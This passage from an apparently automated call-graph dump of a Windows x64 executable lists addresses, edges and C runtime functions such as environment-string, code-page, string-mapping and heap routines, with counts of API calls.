7ff714ca0d25 19676->19681 19678 7ff714c9eb98 _set_fmode 11 API calls 19683 7ff714ca0d55 19678->19683 19679 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19679->19661 19680->19672 19680->19687 19830 7ff714ca6fec 19680->19830 19685 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19681->19685 19682 7ff714ca0cc9 19686 7ff714c94f08 _set_fmode 11 API calls 19682->19686 19689 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19683->19689 19690 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19684->19690 19685->19693 19686->19687 19687->19679 19688->19687 19695 7ff714ca33dc 40 API calls 19688->19695 19689->19680 19694 7ff714ca0de4 19690->19694 19691 7ff714ca0ce7 19691->19680 19692 7ff714ca106c 45 API calls 19691->19692 19692->19680 19693->19678 19693->19680 19693->19687 19697 7ff714ca33dc 40 API calls 19694->19697 19701 7ff714ca0dea 19694->19701 19696 7ff714ca0e6c 19695->19696 19698 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19696->19698 19702 7ff714ca0e16 19697->19702 19699 7ff714ca0e76 19698->19699 19699->19687 19699->19701 19700 7ff714ca0f2f 19704 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19700->19704 19701->19700 19705 7ff714c9eb98 _set_fmode 11 API calls 19701->19705 19703 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19702->19703 19703->19701 19704->19661 19706 7ff714ca0ebb 19705->19706 19707 7ff714ca0ec3 19706->19707 19708 7ff714ca0ecc 19706->19708 19709 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19707->19709 19710 7ff714ca0474 37 API calls 19708->19710 19711 7ff714ca0eca 19709->19711 19712 7ff714ca0eda 19710->19712 19718 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19711->19718 19713 7ff714ca0f6f 19712->19713 19714 7ff714ca0ee2 SetEnvironmentVariableW 19712->19714 19717 7ff714c9a900 _isindst 17 API calls 19713->19717 19715 7ff714ca0f06 19714->19715 19716 7ff714ca0f27 19714->19716 19719 7ff714c94f08 _set_fmode 11 API calls 19715->19719 19721 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19716->19721 19720 7ff714ca0f83 19717->19720 19718->19661 19722 7ff714ca0f0b 19719->19722 19721->19700 19723 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19722->19723 19723->19711 19725 7ff714ca0fb9 19724->19725 19726 7ff714ca0fa1 19724->19726 19727 7ff714c9eb98 _set_fmode 11 API calls 19725->19727 19726->19600 19734 7ff714ca0fdd 19727->19734 19728 7ff714ca1062 19730 7ff714c9a504 __CxxCallCatchBlock 45 API calls 19728->19730 19729 7ff714ca103e 19731 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19729->19731 19732 7ff714ca1068 19730->19732 19731->19726 19733 7ff714c9eb98 _set_fmode 11 API calls 19733->19734 19734->19728 19734->19729 19734->19733 19735 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19734->19735 19736 7ff714c9a4a4 __std_exception_copy 37 API calls 19734->19736 19737 7ff714ca104d 19734->19737 19735->19734 19736->19734 19738 7ff714c9a900 _isindst 17 API calls 19737->19738 19738->19728 19740 7ff714c996d0 19739->19740 19741 7ff714c996d9 19739->19741 19740->19741 19854 7ff714c99198 19740->19854 19741->19615 19741->19616 19746 7ff714ca6254 19745->19746 19747 7ff714ca7139 19745->19747 19748 7ff714ca6261 19746->19748 19756 7ff714ca6297 19746->19756 19749 7ff714c94f4c 45 API calls 19747->19749 19752 7ff714c94f08 _set_fmode 11 API calls 19748->19752 19768 7ff714ca6208 19748->19768 19751 7ff714ca716d 19749->19751 19750 7ff714ca62c1 19753 7ff714c94f08 _set_fmode 11 API calls 19750->19753 19754 7ff714ca7172 19751->19754 19759 7ff714ca7183 19751->19759 19763 7ff714ca719a 19751->19763 19755 7ff714ca626b 19752->19755 19758 7ff714ca62c6 19753->19758 19754->19610 19760 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 19755->19760 19756->19750 19757 7ff714ca62e6 19756->19757 19765 7ff714c94f4c 45 API calls 19757->19765 19771 7ff714ca62d1 19757->19771 19762 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 19758->19762 19764 7ff714c94f08 _set_fmode 11 API calls 19759->19764 19761 7ff714ca6276 19760->19761 19761->19610 19762->19771 19766 7ff714ca71a4 19763->19766 19767 7ff714ca71b6 19763->19767 19769 7ff714ca7188 19764->19769 19765->19771 19772 7ff714c94f08 _set_fmode 11 API calls 19766->19772 19773 7ff714ca71c7 19767->19773 19774 7ff714ca71de 19767->19774 19768->19610 19770 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 19769->19770 19770->19754 19771->19610 19775 7ff714ca71a9 19772->19775 20077 7ff714ca62a4 19773->20077 20086 7ff714ca8f4c 19774->20086 19778 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 19775->19778 19778->19754 19780 7ff714c94f08 _set_fmode 11 API calls 19780->19754 19782 7ff714ca341b 19781->19782 19783 7ff714ca33fe 19781->19783 19787 7ff714ca3425 19782->19787 20126 7ff714ca7c38 19782->20126 19783->19782 19784 7ff714ca340c 19783->19784 19785 7ff714c94f08 _set_fmode 11 API calls 19784->19785 19789 7ff714ca3411 __scrt_get_show_window_mode 19785->19789 20133 7ff714ca7c74 19787->20133 19789->19632 19791 7ff714c94f4c 45 API calls 19790->19791 19792 7ff714ca72aa 19791->19792 19795 7ff714ca72b8 19792->19795 20145 7ff714c9ef24 19792->20145 20148 7ff714c954ac 19795->20148 19797 7ff714ca73a4 19799 7ff714ca73b5 19797->19799 19801 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19797->19801 19798 7ff714c94f4c 45 API calls 19800 7ff714ca7327 19798->19800 19802 7ff714ca0ba3 19799->19802 19804 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19799->19804 19803 7ff714c9ef24 5 API calls 19800->19803 19805 7ff714ca7330 19800->19805 19801->19799 19802->19654 19802->19655 19803->19805 19804->19802 19806 7ff714c954ac 14 API calls 19805->19806 19807 7ff714ca738b 19806->19807 19807->19797 19808 7ff714ca7393 SetEnvironmentVariableW 19807->19808 19808->19797 19810 7ff714ca108f 19809->19810 19811 7ff714ca10ac 19809->19811 19810->19667 19812 7ff714c9eb98 _set_fmode 11 API calls 19811->19812 19813 7ff714ca10d0 19812->19813 19814 7ff714ca1131 19813->19814 19818 7ff714c9eb98 _set_fmode 11 API calls 19813->19818 19819 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19813->19819 19820 7ff714ca0474 37 API calls 19813->19820 19821 7ff714ca1140 19813->19821 19823 7ff714ca1154 19813->19823 19816 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19814->19816 19815 7ff714c9a504 __CxxCallCatchBlock 45 API calls 19817 7ff714ca115a 19815->19817 19816->19810 19818->19813 19819->19813 19820->19813 19822 7ff714c9a900 _isindst 17 API calls 19821->19822 19822->19823 19823->19815 19825 7ff714c99715 19824->19825 19826 7ff714c9970c 19824->19826 19825->19682 19825->19691 19826->19825 20170 7ff714c9920c 19826->20170 19831 7ff714ca6ff9 19830->19831 19834 7ff714ca7026 19830->19834 19832 7ff714ca6ffe 19831->19832 19831->19834 19833 7ff714c94f08 _set_fmode 11 API calls 19832->19833 19836 7ff714ca7003 19833->19836 19835 7ff714ca706a 19834->19835 19838 7ff714ca7089 19834->19838 19852 7ff714ca705e __crtLCMapStringW 19834->19852 19837 7ff714c94f08 _set_fmode 11 API calls 19835->19837 19839 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 19836->19839 19840 7ff714ca706f 19837->19840 19841 7ff714ca7093 19838->19841 19842 7ff714ca70a5 19838->19842 19843 7ff714ca700e 19839->19843 19845 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 19840->19845 19846 7ff714c94f08 _set_fmode 11 API calls 19841->19846 19844 7ff714c94f4c 45 API calls 19842->19844 19843->19680 19848 7ff714ca70b2 19844->19848 19845->19852 19847 7ff714ca7098 19846->19847 19849 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 19847->19849 19848->19852 20217 7ff714ca8b08 19848->20217 19849->19852 19852->19680 19853 7ff714c94f08 _set_fmode 11 API calls 19853->19852 19855 7ff714c991b1 19854->19855 19864 7ff714c991ad 19854->19864 19877 7ff714ca25f0 19855->19877 19860 7ff714c991cf 19903 7ff714c9927c 19860->19903 19861 7ff714c991c3 19862 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19861->19862 19862->19864 19864->19741 19869 7ff714c994ec 19864->19869 19866 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19867 7ff714c991f6 19866->19867 19868 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19867->19868 19868->19864 19870 7ff714c99515 19869->19870 19873 7ff714c9952e 19869->19873 19870->19741 19871 7ff714ca07e8 WideCharToMultiByte 19871->19873 19872 7ff714c9eb98 _set_fmode 11 API calls 19872->19873 19873->19870 19873->19871 19873->19872 19874 7ff714c995be 19873->19874 19876 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19873->19876 19875 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19874->19875 19875->19870 19876->19873 19878 7ff714c991b6 19877->19878 19879 7ff714ca25fd 19877->19879 19883 7ff714ca292c GetEnvironmentStringsW 19878->19883 19922 7ff714c9b224 19879->19922 19884 7ff714c991bb 19883->19884 19885 7ff714ca295c 19883->19885 19884->19860 19884->19861 19886 7ff714ca07e8 WideCharToMultiByte 19885->19886 19887 7ff714ca29ad 19886->19887 19888 7ff714ca29b4 FreeEnvironmentStringsW 19887->19888 19889 7ff714c9d5fc _fread_nolock 12 API calls 19887->19889 19888->19884 19890 7ff714ca29c7 19889->19890 19891 7ff714ca29cf 19890->19891 19892 7ff714ca29d8 19890->19892 19893 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19891->19893 19894 7ff714ca07e8 WideCharToMultiByte 19892->19894 19895 7ff714ca29d6 19893->19895 19896 7ff714ca29fb 19894->19896 19895->19888 19897 7ff714ca29ff 19896->19897 19898 7ff714ca2a09 19896->19898 19900 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19897->19900 19899 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19898->19899 19901 7ff714ca2a07 FreeEnvironmentStringsW 19899->19901 19900->19901 19901->19884 19904 7ff714c992a1 19903->19904 19905 7ff714c9eb98 _set_fmode 11 API calls 19904->19905 19915 7ff714c992d7 19905->19915 19906 7ff714c992df 19907 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19906->19907 19908 7ff714c991d7 19907->19908 19908->19866 19909 7ff714c99352 19910 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19909->19910 19910->19908 19911 7ff714c9eb98 _set_fmode 11 API calls 19911->19915 19912 7ff714c99341 20071 7ff714c994a8 19912->20071 19913 7ff714c9a4a4 __std_exception_copy 37 API calls 19913->19915 19915->19906 19915->19909 19915->19911 19915->19912 19915->19913 19917 7ff714c99377 19915->19917 19919 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19915->19919 19920 7ff714c9a900 _isindst 17 API calls 19917->19920 19918 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19918->19906 19919->19915 19921 7ff714c9938a 19920->19921 19923 7ff714c9b250 FlsSetValue 19922->19923 19924 7ff714c9b235 FlsGetValue 19922->19924 19925 7ff714c9b242 19923->19925 19927 7ff714c9b25d 19923->19927 19924->19925 19926 7ff714c9b24a 19924->19926 19928 7ff714c9b248 19925->19928 19929 7ff714c9a504 __CxxCallCatchBlock 45 API calls 19925->19929 19926->19923 19930 7ff714c9eb98 _set_fmode 11 API calls 19927->19930 19942 7ff714ca22c4 19928->19942 19931 7ff714c9b2c5 19929->19931 19932 7ff714c9b26c 19930->19932 19933 7ff714c9b28a FlsSetValue 19932->19933 19934 7ff714c9b27a FlsSetValue 19932->19934 19936 7ff714c9b296 FlsSetValue 19933->19936 19937 7ff714c9b2a8 19933->19937 19935 7ff714c9b283 19934->19935 19939 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19935->19939 19936->19935 19938 7ff714c9aef4 _set_fmode 11 API calls 19937->19938 19940 7ff714c9b2b0 19938->19940 19939->19925 19941 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19940->19941 19941->19928 19965 7ff714ca2534 19942->19965 19944 7ff714ca22f9 19980 7ff714ca1fc4 19944->19980 19947 7ff714ca2316 19947->19878 19948 7ff714c9d5fc _fread_nolock 12 API calls 19949 7ff714ca2327 19948->19949 19950 7ff714ca232f 19949->19950 19952 7ff714ca233e 19949->19952 19951 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19950->19951 19951->19947 19952->19952 19987 7ff714ca266c 19952->19987 19955 7ff714ca243a 19956 7ff714c94f08 _set_fmode 11 API calls 19955->19956 19957 7ff714ca243f 19956->19957 19960 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19957->19960 19958 7ff714ca2495 19959 7ff714ca24fc 19958->19959 19998 7ff714ca1df4 19958->19998 19963 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19959->19963 19960->19947 19961 7ff714ca2454 19961->19958 19964 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19961->19964 19963->19947 19964->19958 19966 7ff714ca2557 19965->19966 19967 7ff714ca2561 19966->19967 20013 7ff714ca02d8 EnterCriticalSection 19966->20013 19970 7ff714ca25d3 19967->19970 19972 7ff714c9a504 __CxxCallCatchBlock 45 API calls 19967->19972 19970->19944 19973 7ff714ca25eb 19972->19973 19975 7ff714ca2642 19973->19975 19977 7ff714c9b224 50 API calls 19973->19977 19975->19944 19978 7ff714ca262c 19977->19978 19979 7ff714ca22c4 65 API calls 19978->19979 19979->19975 19981 7ff714c94f4c 45 API calls 19980->19981 19982 7ff714ca1fd8 19981->19982 19983 7ff714ca1fe4 GetOEMCP 19982->19983 19984 7ff714ca1ff6 19982->19984 19985 7ff714ca200b 19983->19985 19984->19985 19986 7ff714ca1ffb GetACP 19984->19986 19985->19947 19985->19948 19986->19985 19988 7ff714ca1fc4 47 API calls 19987->19988 19989 7ff714ca2699 19988->19989 19990 7ff714ca27ef 19989->19990 19992 7ff714ca26d6 IsValidCodePage 19989->19992 19997 7ff714ca26f0 __scrt_get_show_window_mode 19989->19997 19991 7ff714c8c550 _log10_special 8 API calls 19990->19991 19993 7ff714ca2431 19991->19993 19992->19990 19994 7ff714ca26e7 19992->19994 19993->19955 19993->19961 19995 7ff714ca2716 GetCPInfo 19994->19995 19994->19997 19995->19990 19995->19997 20014 7ff714ca20dc 19997->20014 20070 7ff714ca02d8 EnterCriticalSection 19998->20070 20015 7ff714ca2119 GetCPInfo 20014->20015 20024 7ff714ca220f 20014->20024 20020 7ff714ca212c 20015->20020 20015->20024 20016 7ff714c8c550 _log10_special 8 API calls 20017 7ff714ca22ae 20016->20017 20017->19990 20018 7ff714ca2e40 48 API calls 20019 7ff714ca21a3 20018->20019 20025 7ff714ca7b84 20019->20025 20020->20018 20023 7ff714ca7b84 54 API calls 20023->20024 20024->20016 20026 7ff714c94f4c 45 API calls 20025->20026 20027 7ff714ca7ba9 20026->20027 20030 7ff714ca7850 20027->20030 20031 7ff714ca7891 20030->20031 20032 7ff714c9f8a0 _fread_nolock MultiByteToWideChar 20031->20032 20036 7ff714ca78db 20032->20036 20033 7ff714ca7b59 20034 7ff714c8c550 _log10_special 8 API calls 20033->20034 20035 7ff714ca21d6 20034->20035 20035->20023 20036->20033 20037 7ff714c9d5fc _fread_nolock 12 API calls 20036->20037 20038 7ff714ca7913 20036->20038 20049 7ff714ca7a11 20036->20049 20037->20038 20040 7ff714c9f8a0 _fread_nolock MultiByteToWideChar 20038->20040 20038->20049 20039 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20039->20033 20041 7ff714ca7986 20040->20041 20041->20049 20061 7ff714c9f0e4 20041->20061 20044 7ff714ca79d1 20048 7ff714c9f0e4 __crtLCMapStringW 6 API calls 20044->20048 20044->20049 20045 7ff714ca7af4 20045->20049 20050 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20045->20050 20046 7ff714ca7a22 20046->20045 20047 7ff714c9d5fc _fread_nolock 12 API calls 20046->20047 20051 7ff714ca7a40 20046->20051 20047->20051 20048->20049 20049->20033 20049->20039 20050->20049 20051->20049 20052 7ff714c9f0e4 __crtLCMapStringW 6 API calls 20051->20052 20053 7ff714ca7ac0 20052->20053 20053->20045 20054 7ff714ca7ae0 20053->20054 20055 7ff714ca7af6 20053->20055 20056 7ff714ca07e8 WideCharToMultiByte 20054->20056 20057 7ff714ca07e8 WideCharToMultiByte 20055->20057 20058 7ff714ca7aee 20056->20058 20057->20058 20058->20045 20059 7ff714ca7b0e 20058->20059 20059->20049 20060 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20059->20060 20060->20049 20062 7ff714c9ed10 __crtLCMapStringW 5 API calls 20061->20062 20063 7ff714c9f122 20062->20063 20065 7ff714c9f12a 20063->20065 20067 7ff714c9f1d0 20063->20067 20065->20044 20065->20046 20065->20049 20066 7ff714c9f193 LCMapStringW 20066->20065 20068 7ff714c9ed10 __crtLCMapStringW 5 API calls 20067->20068 20069 7ff714c9f1fe __crtLCMapStringW 20068->20069 20069->20066 20075 7ff714c994ad 20071->20075 20076 7ff714c99349 20071->20076 20072 7ff714c994d6 20073 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20072->20073 20073->20076 20074 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20074->20075 20075->20072 20075->20074 20076->19918 20078 7ff714ca62c1 20077->20078 20079 7ff714ca62d8 20077->20079 20080 7ff714c94f08 _set_fmode 11 API calls 20078->20080 20079->20078 20081 7ff714ca62e6 20079->20081 20082 7ff714ca62c6 20080->20082 20084 7ff714c94f4c 45 API calls 20081->20084 20085 7ff714ca62d1 20081->20085 20083 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 20082->20083 20083->20085 20084->20085 20085->19754 20087 7ff714c94f4c 45 API calls 20086->20087 20088 7ff714ca8f71 20087->20088 20091 7ff714ca8bc8 20088->20091 20093 7ff714ca8c16 20091->20093 20092 7ff714c8c550 _log10_special 8 API calls 20094 7ff714ca7205 20092->20094 20095 7ff714ca8c9d 20093->20095 20097 7ff714ca8c88 GetCPInfo 20093->20097 20117 7ff714ca8ca1 20093->20117 20094->19754 20094->19780 20096 7ff714c9f8a0 _fread_nolock MultiByteToWideChar 20095->20096 20095->20117 20098 7ff714ca8d35 20096->20098 20097->20095 20097->20117 20099 7ff714ca8d6c 20098->20099 20100 7ff714c9d5fc _fread_nolock 12 API calls 20098->20100 20098->20117 20101 7ff714c9f8a0 _fread_nolock MultiByteToWideChar 20099->20101 20099->20117 20100->20099 20102 7ff714ca8dda 20101->20102 20103 7ff714ca8ebc 20102->20103 20104 7ff714c9f8a0 _fread_nolock MultiByteToWideChar 20102->20104 20105 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20103->20105 20103->20117 20106 7ff714ca8e00 20104->20106 20105->20117 20106->20103 20107 7ff714c9d5fc _fread_nolock 12 API calls 20106->20107 20108 7ff714ca8e2d 20106->20108 20107->20108 20108->20103 20109 7ff714c9f8a0 _fread_nolock MultiByteToWideChar 20108->20109 20110 7ff714ca8ea4 20109->20110 20111 7ff714ca8ec4 20110->20111 20112 7ff714ca8eaa 20110->20112 20120 7ff714c9ef68 20111->20120 20112->20103 20114 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20112->20114 20114->20103 20116 7ff714ca8f03 20116->20117 20119 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20116->20119 20117->20092 20118 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20118->20116 20119->20117 20121 7ff714c9ed10 __crtLCMapStringW 5 API calls 20120->20121 20122 7ff714c9efa6 20121->20122 20123 7ff714c9efae 20122->20123 20124 7ff714c9f1d0 __crtLCMapStringW 5 API calls 20122->20124 20123->20116 20123->20118 20125 7ff714c9f017 CompareStringW 20124->20125 20125->20123 20127 7ff714ca7c41 20126->20127 20128 7ff714ca7c5a HeapSize 20126->20128 20129 7ff714c94f08 _set_fmode 11 API calls 20127->20129 20130 7ff714ca7c46 20129->20130 20131 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 20130->20131 20132 7ff714ca7c51 20131->20132 20132->19787 20134 7ff714ca7c93 20133->20134 20135 7ff714ca7c89 20133->20135 20137 7ff714ca7c98 20134->20137 20143 7ff714ca7c9f _set_fmode 20134->20143 20136 7ff714c9d5fc _fread_nolock 12 API calls 20135->20136 20141 7ff714ca7c91 20136->20141 20138 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20137->20138 20138->20141 20139 7ff714ca7cd2 HeapReAlloc 20139->20141 20139->20143 20140 7ff714ca7ca5 20142 7ff714c94f08 _set_fmode 11 API calls 20140->20142 20141->19789 20142->20141 20143->20139 20143->20140 20144 7ff714ca3590 _set_fmode 2 API calls 20143->20144 20144->20143 20146 7ff714c9ed10 __crtLCMapStringW 5 API calls 20145->20146 20147 7ff714c9ef44 20146->20147 20147->19795 20149 7ff714c954d6 20148->20149 20150 7ff714c954fa 20148->20150 20154 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20149->20154 20159 7ff714c954e5 20149->20159 20151 7ff714c954ff 20150->20151 20152 7ff714c95554 20150->20152 20155 7ff714c95514 20151->20155 20156 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20151->20156 20151->20159 20153 7ff714c9f8a0 _fread_nolock MultiByteToWideChar 20152->20153 20163 7ff714c95570 20153->20163 20154->20159 20157 7ff714c9d5fc _fread_nolock 12 API calls 20155->20157 20156->20155 20157->20159 20158 7ff714c95577 GetLastError 20161 7ff714c94e7c _fread_nolock 11 API calls 20158->20161 20159->19797 20159->19798 20160 7ff714c955b2 20160->20159 20164 7ff714c9f8a0 _fread_nolock MultiByteToWideChar 20160->20164 20165 7ff714c95584 20161->20165 20162 7ff714c955a5 20167 7ff714c9d5fc _fread_nolock 12 API calls 20162->20167 20163->20158 20163->20160 20163->20162 20166 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20163->20166 20168 7ff714c955f6 20164->20168 20169 7ff714c94f08 _set_fmode 11 API calls 20165->20169 20166->20162 20167->20160 20168->20158 20168->20159 20169->20159 20171 7ff714c99225 20170->20171 20182 7ff714c99221 20170->20182 20191 7ff714ca2a3c GetEnvironmentStringsW 20171->20191 20174 7ff714c99232 20176 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20174->20176 20175 7ff714c9923e 20198 7ff714c9938c 20175->20198 20176->20182 20179 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20180 7ff714c99265 20179->20180 20181 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20180->20181 20181->20182 20182->19825 20183 7ff714c995cc 20182->20183 20184 7ff714c995ef 20183->20184 20189 7ff714c99606 20183->20189 20184->19825 20185 7ff714c9f8a0 MultiByteToWideChar _fread_nolock 20185->20189 20186 7ff714c9eb98 _set_fmode 11 API calls 20186->20189 20187 7ff714c9967a 20188 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20187->20188 20188->20184 20189->20184 20189->20185 20189->20186 20189->20187 20190 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20189->20190 20190->20189 20192 7ff714c9922a 20191->20192 20193 7ff714ca2a60 20191->20193 20192->20174 20192->20175 20194 7ff714c9d5fc _fread_nolock 12 API calls 20193->20194 20195 7ff714ca2a97 memcpy_s 20194->20195 20196 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20195->20196 20197 7ff714ca2ab7 FreeEnvironmentStringsW 20196->20197 20197->20192 20199 7ff714c993b4 20198->20199 20200 7ff714c9eb98 _set_fmode 11 API calls 20199->20200 20201 7ff714c993ef 20200->20201 20203 7ff714c99471 20201->20203 20206 7ff714c9eb98 _set_fmode 11 API calls 20201->20206 20207 7ff714c99460 20201->20207 20208 7ff714ca0474 37 API calls 20201->20208 20211 7ff714c99494 20201->20211 20214 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20201->20214 20215 7ff714c993f7 20201->20215 20202 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20205 7ff714c99246 20202->20205 20204 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20203->20204 20204->20205 20205->20179 20206->20201 20209 7ff714c994a8 11 API calls 20207->20209 20208->20201 20210 7ff714c99468 20209->20210 20212 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20210->20212 20213 7ff714c9a900 _isindst 17 API calls 20211->20213 20212->20215 20216 7ff714c994a6 20213->20216 20214->20201 20215->20202 20219 7ff714ca8b31 __crtLCMapStringW 20217->20219 20218 7ff714ca70ee 20218->19852 20218->19853 20219->20218 20220 7ff714c9ef68 6 API calls 20219->20220 20220->20218 16563 7ff714c8cc3c 16584 7ff714c8ce0c 16563->16584 16566 7ff714c8cd88 16738 7ff714c8d12c IsProcessorFeaturePresent 16566->16738 16567 7ff714c8cc58 __scrt_acquire_startup_lock 16569 7ff714c8cd92 16567->16569 16576 7ff714c8cc76 __scrt_release_startup_lock 16567->16576 16570 7ff714c8d12c 7 API calls 16569->16570 16571 7ff714c8cd9d __CxxCallCatchBlock 16570->16571 16572 7ff714c8cc9b 16573 7ff714c8cd21 16590 7ff714c8d274 16573->16590 16575 7ff714c8cd26 16593 7ff714c81000 16575->16593 16576->16572 16576->16573 16727 7ff714c99b2c 16576->16727 16581 7ff714c8cd49 16581->16571 16734 7ff714c8cf90 16581->16734 16585 7ff714c8ce14 16584->16585 16586 7ff714c8ce20 __scrt_dllmain_crt_thread_attach 16585->16586 16587 7ff714c8cc50 16586->16587 16588 7ff714c8ce2d 16586->16588 16587->16566 16587->16567 16588->16587 16745 7ff714c8d888 16588->16745 16591 7ff714caa4d0 __scrt_get_show_window_mode 16590->16591 16592 7ff714c8d28b GetStartupInfoW 16591->16592 16592->16575 16594 7ff714c81009 16593->16594 16772 7ff714c95484 16594->16772 16596 7ff714c837fb 16779 7ff714c836b0 16596->16779 16601 7ff714c8c550 _log10_special 8 API calls 16604 7ff714c83ca7 16601->16604 16602 7ff714c8383c 16939 7ff714c81c80 16602->16939 16603 7ff714c8391b 16948 7ff714c845c0 16603->16948 16732 7ff714c8d2b8 GetModuleHandleW 16604->16732 16607 7ff714c8385b 16851 7ff714c88830 16607->16851 16610 7ff714c8396a 16971 7ff714c82710 16610->16971 16612 7ff714c8388e 16621 7ff714c838bb __std_exception_copy 16612->16621 16943 7ff714c889a0 16612->16943 16614 7ff714c8395d 16615 7ff714c83984 16614->16615 16616 7ff714c83962 16614->16616 16617 7ff714c81c80 49 API calls 16615->16617 16967 7ff714c9004c 16616->16967 16620 7ff714c839a3 16617->16620 16626 7ff714c81950 115 API calls 16620->16626 16623 7ff714c88830 14 API calls 16621->16623 16629 7ff714c838de __std_exception_copy 16621->16629 16623->16629 16624 7ff714c83a0b 16625 7ff714c889a0 40 API calls 16624->16625 16627 7ff714c83a17 16625->16627 16628 7ff714c839ce 16626->16628 16630 7ff714c889a0 40 API calls 16627->16630 16628->16607 16631 7ff714c839de 16628->16631 16635 7ff714c8390e __std_exception_copy 16629->16635 16982 7ff714c88940 16629->16982 16632 7ff714c83a23 16630->16632 16633 7ff714c82710 54 API calls 16631->16633 16634 7ff714c889a0 40 API calls 16632->16634 16641 7ff714c83808 __std_exception_copy 16633->16641 16634->16635 16636 7ff714c88830 14 API calls 16635->16636 16637 7ff714c83a3b 16636->16637 16638 7ff714c83a60 __std_exception_copy 16637->16638 16639 7ff714c83b2f 16637->16639 16642 7ff714c88940 40 API calls 16638->16642 16653 7ff714c83aab 16638->16653 16640 7ff714c82710 54 API calls 16639->16640 16640->16641 16641->16601 16642->16653 16643 7ff714c88830 14 API calls 16644 7ff714c83bf4 __std_exception_copy 16643->16644 16645 7ff714c83c46 16644->16645 16646 7ff714c83d41 16644->16646 16648 7ff714c83cd4 16645->16648 16649 7ff714c83c50 16645->16649 16989 7ff714c844e0 16646->16989 16651 7ff714c88830 14 API calls 16648->16651 16864 7ff714c890e0 16649->16864 16655 7ff714c83ce0 16651->16655 16652 7ff714c83d4f 16656 7ff714c83d65 16652->16656 16657 7ff714c83d71 16652->16657 16653->16643 16658 7ff714c83c61 16655->16658 16661 7ff714c83ced 16655->16661 16992 7ff714c84630 16656->16992 16660 7ff714c81c80 49 API calls 16657->16660 16663 7ff714c82710 54 API calls 16658->16663 16669 7ff714c83cc8 __std_exception_copy 16660->16669 16664 7ff714c81c80 49 API calls 